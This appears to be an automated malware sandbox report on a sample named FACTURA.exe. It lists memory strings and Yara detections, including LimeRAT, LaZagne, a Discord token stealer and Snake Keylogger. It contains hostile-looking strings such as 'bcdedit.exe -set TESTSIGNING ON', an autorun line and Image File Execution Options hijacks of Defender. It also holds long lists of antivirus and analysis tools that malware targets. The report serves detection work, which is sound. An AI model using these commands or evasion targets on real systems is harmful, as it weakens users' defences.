Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\interchinac
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\3721\cnsminc
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\3721\cnsmin
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\3721\cnsminc"
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\classes\zsmod.axobj
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\classes\zsmod.axobjc"
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\classes\zsmod.axobjc#
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\classes\insiii.brins
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\classes\insiii.brinsc#
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\3721\cnsmin\cnsminex
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\3721\cnsmin\cnsminexc#
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\classes\cnshelper.ch
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\classes\cnshelper.chc#
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\classes\bhoobj.axobj
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\classes\bhoobj.axobjc#
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\classes\insiii.brinsc$
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\classes\zsmod.axobj.1
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\classes\zsmod.axobj.1c$
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\classes\autolive.live
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\classes\autolive.livec$
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\classes\zsmod.axobj.1c%
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\classes\insiii.brins.1
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\classes\insiii.brins.1c%
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\classes\cnshelper.ch.1
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\classes\cnshelper.ch.1c%
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\classes\insiii.brins.1c&
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\classes\installer.brins
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\classes\installer.brinsc&
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: software\classes\autolive.live.1
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp Binary or memory string: MSVBVM60MSVBVM50MSVBVM events are artifactsRICHEDIT50Wmyself.dll%08x0x%xException in the timer procC:\Wallpaper1.bmp2 :|:1 11EditButtonVDLL:HMValidateHandleCalledC:\C:\WinSta0SkypeControlAPISkypeControlAPIAttachSkypeControlAPIDiscoverGDI32.DLLArmadillo_MutexGDI32.DLLChildControlStaticListBoxScrollBarComboBox#32770DialogPEEMU:VirTool:Win32/Obfuscator_Upatreriched20.dllRichEditANSIWndProcRichEditMDICLIENTMDICLIENTlistboxWINSTA0WinSta0Winsta0Winsta000000409CursorInternet Explorer_ServerTibiaClientTibia#32769ATL:007BF380YTopWindowYahooBuddyMainYahoo! MessengerWMPlayerAppPlaying MP3NotepadMy saved passwords - NotepadProgram ManagerShell_TrayWndtooltips_class32CityBank log-inIEFrameBank of America log-infalsetrue_Dummy_0x6A__Dummy_0x69__Dummy_0x68__Dummy_0x67__Dummy_0x66__Dummy_0x65__Dummy_0x64__Dummy_0x63__Dummy_0x62__Dummy_0x61__Dummy_0x60__Dummy_0x5F__Dummy_0x5E__Dummy_0x5D__Dummy_0x5C__Dummy_0x5B__Dummy_0x5A__Dummy_0x59__Dummy_0x58__Dummy_0x57__Dummy_0x56__Dummy_0x55__Dummy_0x54__Dummy_0x53__Dummy_0x52__Dummy_0x51__Dummy_0x50__Dummy_0x4F__Dummy_0x4E__Dummy_0x4D__Dummy_0x4C__Dummy_0x4B__Dummy_0x4A__Dummy_0x49__Dummy_0x48__Dummy_0x47__Dummy_0x46__Dummy_0x45__Dummy_0x44__Dummy_0x43__Dummy_0x42__Dummy_0x41__Dummy_0x40__Dummy_0x3F__Dummy_0x3E__Dummy_0x3D__Dummy_0x3C__Dummy_0x3B__Dummy_0x3A__Dummy_0x39__Dummy_0x38__Dummy_0x37__Dummy_0x36__DummyAA__DummyZ__DummyW__DummyV__DummyU__DummyT__DummyS__DummyR__DummyQ__DummyP__DummyO__DummyN__DummyM__DummyL__DummyK__DummyJ__DummyI__DummyH__DummyG__DummyF__DummyE__DummyD__DummyC__DummyB__DummyA__Dummy9__Dummy_x1c__Dummy7__Dummy6__Dummy5__Dummy4__Dummy3__Dummy2__Dummy_
Source: MpSigStub.exe, 00000024.00000003.6284577103.00000197A4BC1000.00000004.00000001.sdmp Binary or memory string: C:\WINDOWS\SYSTEM32\progman.exeexe D
Source: FACTURA.exe, 00000001.00000000.2909753297.0000000000DD0000.00000002.00020000.sdmp, UserOOBEBroker.exe, 00000017.00000002.7884746567.000001F548A60000.00000002.00020000.sdmp, MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp Binary or memory string: Program Manager
Source: FACTURA.exe, 00000001.00000000.2909753297.0000000000DD0000.00000002.00020000.sdmp, UserOOBEBroker.exe, 00000017.00000002.7884746567.000001F548A60000.00000002.00020000.sdmp, MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: MpSigStub.exe, 00000024.00000003.6276556833.00000197A3CCB000.00000004.00000001.sdmp Binary or memory string: GetProgmanWindow
Source: FACTURA.exe, 00000001.00000000.2909753297.0000000000DD0000.00000002.00020000.sdmp, UserOOBEBroker.exe, 00000017.00000002.7884746567.000001F548A60000.00000002.00020000.sdmp Binary or memory string: Progman
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWndx
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp Binary or memory string: %s\Rundll32.exe "%s\%s",DllCanUnloadNowShell_TrayWndSoftware\
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp Binary or memory string: ~SystemCache.batShell_TrayWnd
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp Binary or memory string: \Internet Explorer\Quick Launch\Shell_TrayWnd
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp Binary or memory string: Progman Folder*Administrative Tools
Source: FACTURA.exe, 00000001.00000000.2909753297.0000000000DD0000.00000002.00020000.sdmp, UserOOBEBroker.exe, 00000017.00000002.7884746567.000001F548A60000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: MpSigStub.exe, 00000024.00000003.6293664511.00000197A3192000.00000004.00000001.sdmp Binary or memory string: shell_traywnd%s\C:\WINDOWS\Sy
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp Binary or memory string: Explorer.exeShell_TrayWndGetProc
Source: MpSigStub.exe, 00000024.00000003.6293664511.00000197A3192000.00000004.00000001.sdmp Binary or memory string: shell_traywnd
Source: MpSigStub.exe, 00000024.00000003.6276556833.00000197A3CCB000.00000004.00000001.sdmp Binary or memory string: SetProgmanWindow
Source: MpSigStub.exe, 00000024.00000003.6293664511.00000197A3192000.00000004.00000001.sdmp Binary or memory string: shell_traywnd
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe Code function: 35_2_00007FF67CD48ED4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 35_2_00007FF67CD48ED4

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Yara detected LimeRAT
Source: Yara match File source: 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
May enable test signing (to load unsigned drivers)
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp Memory string: bcdedit.exe -set TESTSIGNING ON
Source: MpSigStub.exe, 00000024.00000003.6275006647.0000019790C75000.00000004.00000001.sdmp Memory string: bcdedit.exe -set TESTSIGNING ON
May initialize a security null descriptor
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp Binary or memory string: &S:(ML;;NRNWNX;;;LW)
AV process strings found (often used to terminate AV products)
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp Binary or memory string: scanwscs.exe
Source: MpSigStub.exe, 00000024.00000003.6284577103.00000197A4BC1000.00000004.00000001.sdmp Binary or memory string: \avgupd.exe
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp Binary or memory string: Bsoftware\microsoft\windows\currentversion\app paths\wireshark.exe
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp Binary or memory string: procmon.exe
Source: MpSigStub.exe, 00000024.00000003.6340102815.00000197A329B000.00000004.00000001.sdmp Binary or memory string: tcpview.exe
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp Binary or memory string: \startup\360tray.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp Binary or memory string: fsgk32.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp Binary or memory string: bullguard.exe
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp Binary or memory string: kav32.exe
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp Binary or memory string: sched.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp Binary or memory string: fsm32.exe
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: ravmond.exe
Source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp Binary or memory string: \windows defender\msascui.exe
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp Binary or memory string: \msmpeng.exe
Source: MpSigStub.exe, 00000024.00000003.6341931442.00000197A45E4000.00000004.00000001.sdmp Binary or memory string: hijackthis.exe
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp Binary or memory string: fsav32.exe
Source: MpSigStub.exe, 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp Binary or memory string: FSMA32.EXE
Source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp Binary or memory string: [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp Binary or memory string: fsbl.exe
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp Binary or memory string: KVXP.kxp
Source: MpSigStub.exe, 00000024.00000003.6340102815.00000197A329B000.00000004.00000001.sdmp Binary or memory string: procdump.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp Binary or memory string: fpavserver.exe
Source: MpSigStub.exe, 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp Binary or memory string: kxetray.exe
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp Binary or memory string: \360tray.exe
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp Binary or memory string: \virus.exe
Source: MpSigStub.exe, 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp Binary or memory string: wireshark.exe
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp Binary or memory string: KAVPFW.EXE
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp Binary or memory string: ESET\nod32.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp Binary or memory string: sbamtray.exe
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp Binary or memory string: pctsGui.exe
Source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp Binary or memory string: 360tray.exe
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp Binary or memory string: torun.infshell\open\command=virus.exe[AutoRun]\virus.exe
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp Binary or memory string: 360Tray.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp Binary or memory string: superantispyware.exe
Source: MpSigStub.exe, 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp Binary or memory string: mcvsshld.exe
Source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp Binary or memory string: [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe
Source: MpSigStub.exe, 00000024.00000003.6321140724.00000197A3AFC000.00000004.00000001.sdmp Binary or memory string: \windows defender\msmpeng.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp Binary or memory string: op_mon.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp Binary or memory string: k7emlpxy.exe
Source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp Binary or memory string: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp Binary or memory string: quhlpsvc.exe
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp Binary or memory string: KvXP.kxp
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp Binary or memory string: msmpeng.exe
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: 360TraY.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp Binary or memory string: k7pssrvc.exe
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp Binary or memory string: *.csv.|!\SBAMSvc.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp Binary or memory string: k7tsmngr.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp Binary or memory string: emlproxy.exe
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp Binary or memory string: nod32.exe
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp Binary or memory string: kav.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp Binary or memory string: fprottray.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp Binary or memory string: clamtray.exe
Source: MpSigStub.exe, 00000024.00000003.6285606128.00000197A309B000.00000004.00000001.sdmp Binary or memory string: savservice.exe
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp Binary or memory string: nod32krn.exe
Source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp Binary or memory string: avgupd.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp Binary or memory string: guardxservice.exe
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp Binary or memory string: regshot.exe
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp Binary or memory string: kavstart.exe
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp Binary or memory string: bdagent.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp Binary or memory string: k7fwsrvc.exe
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp Binary or memory string: \avp.exe
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp Binary or memory string: KavPFW.EXE
Source: MpSigStub.exe, 00000024.00000003.6300197684.00000197A42BB000.00000004.00000001.sdmp Binary or memory string: \kav.exe
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: MSMPENG.EXE
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp Binary or memory string: avkservice.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp Binary or memory string: virusutilities.exe
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp Binary or memory string: 0{645FF040-5081-101B-9F08-00AA002F954E}\kav32.exe
Source: MpSigStub.exe, 00000024.00000003.6290223213.00000197A39E2000.00000004.00000001.sdmp Binary or memory string: lordpe.exe
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp Binary or memory string: McAfee.com\VSO\Mcshield.exe
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: *.manifest.|!\SavService.exe
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp Binary or memory string: autoruns.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp Binary or memory string: k7rtscan.exe
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp Binary or memory string: SPIDERNT.EXE
Source: MpSigStub.exe, 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp Binary or memory string: mcagent.exe
Source: MpSigStub.exe, 00000024.00000003.6283020613.00000197A471D000.00000004.00000001.sdmp Binary or memory string: msascui.exe
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp Binary or memory string: ICESWORD.EXE
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp Binary or memory string: avkproxy.exe
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp Binary or memory string: AVGcsrvx.exe
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp Binary or memory string: RC:\Program Files\Wireshark\wireshark.exe
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp Binary or memory string: AVP.EXE
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp Binary or memory string: bdss.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp Binary or memory string: sbamsvc.exe
Source: MpSigStub.exe, 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp Binary or memory string: Vsserv.exe
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp Binary or memory string: IceSword.exe
Source: MpSigStub.exe, 00000024.00000003.6305465801.00000197A4278000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp Binary or memory string: clamwin.exe
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp Binary or memory string: kvxp.kxp
Source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp Binary or memory string: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp Binary or memory string: fsma32.exe
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp Binary or memory string: MSASCui.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp Binary or memory string: acs.exe
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: Ravmond.exe
Source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp Binary or memory string: avp.exe
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp Binary or memory string: 360safe.exe
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp Binary or memory string: Wireshark.exe
Source: MpSigStub.exe, 00000024.00000003.6296880704.00000197A4AB8000.00000004.00000001.sdmp Binary or memory string: 360Safe.exe
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp Binary or memory string: KAV32.exe
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp Binary or memory string: c:\123.exe
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp Binary or memory string: \procdump.exe
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp Binary or memory string: *.jpg.|!\SavService.exe
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp Binary or memory string: avgnt.exe
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp Binary or memory string: \vipre business agent\sbamsvc.exe
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp Binary or memory string: a2guard.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp Binary or memory string: mbam.exe
Source: MpSigStub.exe, 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp Binary or memory string: FSMB32.EXE
Source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp Binary or memory string: (\avp.exe
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp Binary or memory string: ollydbg.exe
Source: MpSigStub.exe, 00000024.00000003.6340510692.00000197A4B3C000.00000004.00000001.sdmp Binary or memory string: Image File Execution Options\msmpeng.exeDebuggerImage File Execution Options\msascui.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp Binary or memory string: avktray.exe
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp Binary or memory string: Regshot.exe
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp Binary or memory string: nod32kui.exe
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp Binary or memory string: KPFW32.EXE
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp Binary or memory string: mcshield.exe
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: icesword.exe
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp Binary or memory string: \App Paths\360Safe.exe
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp Binary or memory string: AVGcmgr.exe
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp Binary or memory string: fsav.exe
Source: MpSigStub.exe, 00000024.00000003.6341931442.00000197A45E4000.00000004.00000001.sdmp Binary or memory string: delc:\programme\"windowsdefender"\msmpeng.exe
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp, mpam-fad3e9a8.exe Binary or memory string: MsMpEng.exe
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp Binary or memory string: "\vipre business agent\sbamsvc.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp Binary or memory string: onlinent.exe
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp Binary or memory string: \MsMpEng.exe
Source: MpSigStub.exe, 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp Binary or memory string: FSAV32.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp Binary or memory string: cmdagent.exe
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp Binary or memory string: avguard.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp Binary or memory string: fpwin.exe
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp Binary or memory string: zlclient.exe
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp Binary or memory string: avgtray.exe
Source: MpSigStub.exe, 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp Binary or memory string: McShield.exe
Source: MpSigStub.exe, 00000024.00000003.6285606128.00000197A309B000.00000004.00000001.sdmp Binary or memory string: RImage File Execution Options\MSMPENG.exe
Source: MpSigStub.exe, 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp Binary or memory string: TmPfw.exe
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp Binary or memory string: KVMonXP.kxp
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp Binary or memory string: regedit.com
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp Binary or memory string: procexp.exe
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp Binary or memory string: %installlocation%\msmpeng.exe
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: license.rtf.|!\SavService.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp Binary or memory string: k7tsecurity.exe
Source: MpSigStub.exe, 00000024.00000003.6341931442.00000197A45E4000.00000004.00000001.sdmp Binary or memory string: /delc:\programme\"windowsdefender"\msmpeng.exe
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp Binary or memory string: Mcshield.exe
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp Binary or memory string: regmon.exe

Stealing of Sensitive Information:

barindex
Yara detected LaZagne password dumper
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Neshta
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Discord Token Stealer
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected MailPassView
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Snake Keylogger
